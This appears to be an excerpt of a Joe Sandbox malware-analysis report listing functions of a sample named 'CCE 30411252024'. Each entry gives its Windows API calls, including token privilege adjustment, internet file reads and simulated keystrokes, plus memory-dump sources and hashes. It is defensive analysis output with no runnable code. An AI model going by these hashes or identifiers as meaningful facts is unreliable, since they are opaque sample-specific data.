                                                                                        • Instruction Fuzzy Hash: E541D1356003018FC708DF68D890AAAB3E4FF49324F20455DFA5A8B3A1DB71E940DB91
                                                                                        Function 00F48111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: 7bad5304fa1b5ec1ddec3ea099f389c10987b6032e5805384b12f79ca84ffb28
                                                                                        • Instruction ID: d5151657064b2ad633cf8b14685d0ab1eddb6629e3b7d8d01f9923c6da0a39f7
                                                                                        • Opcode Fuzzy Hash: 7bad5304fa1b5ec1ddec3ea099f389c10987b6032e5805384b12f79ca84ffb28
                                                                                        • Instruction Fuzzy Hash: 9911B231B005146BE7216F26DC44E6FBB9CEF847A0B05042EF949D7281CF709903A6A5
                                                                                        Function 00EE9B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                        • API String ID: 0-1546025612
                                                                                        • Opcode ID: 52c3287f3d7000658fd8ef50d72f546f36dadcbb816a2ff8b8688a32c62fcf12
                                                                                        • Instruction ID: f917731c5192c1a6be5541cf64ba64a87c11da38b3bfd0415efa92c46a54c3a6
                                                                                        • Opcode Fuzzy Hash: 52c3287f3d7000658fd8ef50d72f546f36dadcbb816a2ff8b8688a32c62fcf12
                                                                                        • Instruction Fuzzy Hash: 6A928A71E0025ACBDF24CF59C8807BDB7B1BB54314F2881AAE856FB281D770AD81DB91
                                                                                        Function 00EFE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00EFE014,76230AE0,00EFDEF1,00F7DC38,?,?), ref: 00EFE02C
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EFE03E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        • Opcode ID: d4f34b72b96bf77e50ad9b103e08f1d604031e1dc07f08fb7ce85aa9a5f133b2
                                                                                        • Instruction ID: 27d94e9fdd45c7d934b2efdb431144f03361e113cad387ce3db823c8d6140f65
                                                                                        • Opcode Fuzzy Hash: d4f34b72b96bf77e50ad9b103e08f1d604031e1dc07f08fb7ce85aa9a5f133b2
                                                                                        • Instruction Fuzzy Hash: E0D0A730901716EFEB315F61EC4862276D4AB01308F188419E491E2260DBF4DC809A50
                                                                                        Function 00F213CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F213DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ($|
                                                                                        • API String ID: 1659193697-1631851259
                                                                                        • Opcode ID: 43bf9600a5b9de92227d3ca1e25e05b5998b26c72657ab2d892806253103e0bf
                                                                                        • Instruction ID: 38e5250424802c49b95e44a7939c2113b82a891f3f9843cde6acb203cbb76d6a
                                                                                        • Opcode Fuzzy Hash: 43bf9600a5b9de92227d3ca1e25e05b5998b26c72657ab2d892806253103e0bf
                                                                                        • Instruction Fuzzy Hash: 84324675A007159FC728DF29D480AAAB7F0FF58320B15C46EE59ADB3A1E770E981CB44
                                                                                        Function 00EFB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00EFB22F
                                                                                          • Part of subcall function 00EFB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00EFB5A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Proc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2749884682-0
                                                                                        • Opcode ID: 2f966a3d11c4996a574fb36bee9e0dce7ab479f0e713682d335458a961647b47
                                                                                        • Instruction ID: eede990f8db948ba5c1409bd12d3187d68a214aa43ae5aa31c1b2ec01b71857c
                                                                                        • Opcode Fuzzy Hash: 2f966a3d11c4996a574fb36bee9e0dce7ab479f0e713682d335458a961647b47
                                                                                        • Instruction Fuzzy Hash: 80A149A051400CFAF72CAE29DC88EBF395CEB46355F189119FF06FA1A2DB159D04B272
                                                                                        Function 00F34EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F343BF,00000000), ref: 00F34FA6
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F34FD2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        • Opcode ID: c488c136240f6fc762d564ff37b0426c4e030d2978ed7f12408409686f108e6d
                                                                                        • Instruction ID: b00999e5f5d869eceacf6cf6185457bfa182b6923d4ae1f865a1b0e2e93aaccc
                                                                                        • Opcode Fuzzy Hash: c488c136240f6fc762d564ff37b0426c4e030d2978ed7f12408409686f108e6d
                                                                                        • Instruction Fuzzy Hash: E341C672A04609BFEB209E94CC85FBF77ACEB80774F14402AF60567181DA75BE41B6A0
                                                                                        Function 00F2E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00F2E20D
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F2E267
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F2E2B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1682464887-0
                                                                                        • Opcode ID: b71d440b10ee775fb6b313f09c15d69eba0cd2d865886b79f0ab9fdb656d6fc1
                                                                                        • Instruction ID: b86b82ba09f782e95ed7c2bb23610cd740323dbc4f85eeba2f444aea6b021734
                                                                                        • Opcode Fuzzy Hash: b71d440b10ee775fb6b313f09c15d69eba0cd2d865886b79f0ab9fdb656d6fc1
                                                                                        • Instruction Fuzzy Hash: 2A216D35A00118EFCB00EFA5D884AADFBF8FF49314F1484A9E905EB392DB719905DB50
                                                                                        Function 00F1B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFF4EA: std::exception::exception.LIBCMT ref: 00EFF51E
                                                                                          • Part of subcall function 00EFF4EA: __CxxThrowException@8.LIBCMT ref: 00EFF533
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1B180
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F1B1AD
                                                                                        • GetLastError.KERNEL32 ref: 00F1B1BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        • Opcode ID: 810caac4bb4c357f1060c1b69e9bfb525b0168f4d04f5d44b095494d9b6ec4d7
                                                                                        • Instruction ID: eb515ba6f00a3054c99622241ff9a0dba66bc7e1791d6bc81b06765a8c961ff3
                                                                                        • Opcode Fuzzy Hash: 810caac4bb4c357f1060c1b69e9bfb525b0168f4d04f5d44b095494d9b6ec4d7
                                                                                        • Instruction Fuzzy Hash: DA11BFB2900209FFE7189F64DC95D6BB7ECEF44310B21852EE456A3240DB70FC418A60
                                                                                        Function 00F26685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F266AF
                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00F266EC
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F266F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 33631002-0
                                                                                        • Opcode ID: 831acf4a9df6bacc6594d20d5e02ac91a94e74436360d2cdb7ae4ae91a7c4d94
                                                                                        • Instruction ID: 0a3d2300de79a3aaf047c848855df3d308ab47770eaacd981bde1b10b4cbeea2
                                                                                        • Opcode Fuzzy Hash: 831acf4a9df6bacc6594d20d5e02ac91a94e74436360d2cdb7ae4ae91a7c4d94
                                                                                        • Instruction Fuzzy Hash: 5611C8B2E01228BFE7108BACEC45FAF7BBCEB09754F104555F911E7190C2B4AE0497A1
                                                                                        Function 00F271FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F27223
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F2723A
                                                                                        • FreeSid.ADVAPI32(?), ref: 00F2724A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 37a317c97f8483648d01479b7db36701639b9ce5da91767d10c1a49bb358dc29
                                                                                        • Instruction ID: 40a789a915ceb14848d4a7e9947b982572a3a3b1808198f379824595a39350f4
                                                                                        • Opcode Fuzzy Hash: 37a317c97f8483648d01479b7db36701639b9ce5da91767d10c1a49bb358dc29
                                                                                        • Instruction Fuzzy Hash: F8F01D76E0430DFFDF04DFE4DD99AEEBBB8EF08201F104469E612E2191E2709A44AB10
                                                                                        Function 00F2F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F2F599
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F2F5C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: bbfcf566bcf064b4b0b29b6bf52da764e6e2e17fd6db8e3ba44a1873b324e062
                                                                                        • Instruction ID: c64a773b08be79f154fbdcd3816842ec5dd1c69011dc91211dd3a9d7464d1d58
                                                                                        • Opcode Fuzzy Hash: bbfcf566bcf064b4b0b29b6bf52da764e6e2e17fd6db8e3ba44a1873b324e062
                                                                                        • Instruction Fuzzy Hash: 5F11C4326006049FD710EF29D845A2EF3E8FF85324F04892EF9A5D7291CB74AD048B91
                                                                                        Function 00F2CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F3BE6A,?,?,00000000,?), ref: 00F2CEA7
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F3BE6A,?,?,00000000,?), ref: 00F2CEB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 89356ca3eec5b9c8be104a74ea4c2bd456d04832f365f94add9165bf529f71be
                                                                                        • Instruction ID: 394fc92c632ec08daac32bc2e74bba717b400738868b99aa4df1cb94c84da442
                                                                                        • Opcode Fuzzy Hash: 89356ca3eec5b9c8be104a74ea4c2bd456d04832f365f94add9165bf529f71be
                                                                                        • Instruction Fuzzy Hash: 5BF0EC3150022DABEB20ABA0DC49FEA73ACBF083A0F008125F819D2180C6709A00EBA0
                                                                                        Function 00F2411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F24153
                                                                                        • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00F24166
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InputSendkeybd_event
                                                                                        • String ID:
                                                                                        • API String ID: 3536248340-0
                                                                                        • Opcode ID: 01b1e7275f3d2f8ba87e45445edcbd6368e2d54816dde9e81f8e238341eae368
                                                                                        • Instruction ID: 8641237404ad7948bfd4c7d91b069878c2993d1a7601c7f182eddd2fdeeb6bef
                                                                                        • Opcode Fuzzy Hash: 01b1e7275f3d2f8ba87e45445edcbd6368e2d54816dde9e81f8e238341eae368
                                                                                        • Instruction Fuzzy Hash: D3F0907090034DAFDB068FA0C805BBE7FB0EF04305F04800AF96696191D7B9D612EFA4
                                                                                        Function 00F1AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F1ACC0), ref: 00F1AB99
                                                                                        • CloseHandle.KERNEL32(?,?,00F1ACC0), ref: 00F1ABAB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: caabe6ecba305bed9182c35f59d0ee8e592595025259e1f792bb1fc016fef12d
                                                                                        • Instruction ID: 1cdf41defcf231b1ddb1b15ec7c9113bc8b0ab122b6e39b65d7f2b427dba3f8c
                                                                                        • Opcode Fuzzy Hash: caabe6ecba305bed9182c35f59d0ee8e592595025259e1f792bb1fc016fef12d
                                                                                        • Instruction Fuzzy Hash: 2DE0E671404515AFE7252F54ED05D7777E9EF043217148429F55981470D7625C90EB50
                                                                                        Function 00F081AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00F06DB3,-0000031A,?,?,00000001), ref: 00F081B1
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F081BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 1e1fd55a823bd8711488043466348f9f06dfadcb8ae0eeff71e12290eeefbd7d
                                                                                        • Instruction ID: d3ff799da91b41afb2b88ceeba3d8c693ff6dd67cc7f4df0a787ddcad6f5bd09
                                                                                        • Opcode Fuzzy Hash: 1e1fd55a823bd8711488043466348f9f06dfadcb8ae0eeff71e12290eeefbd7d
                                                                                        • Instruction Fuzzy Hash: B1B0923164460CABDB002BA2EC0AB587F68EB08652F004010F62D44261CBB35410AA96
                                                                                        Function 00EE77B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
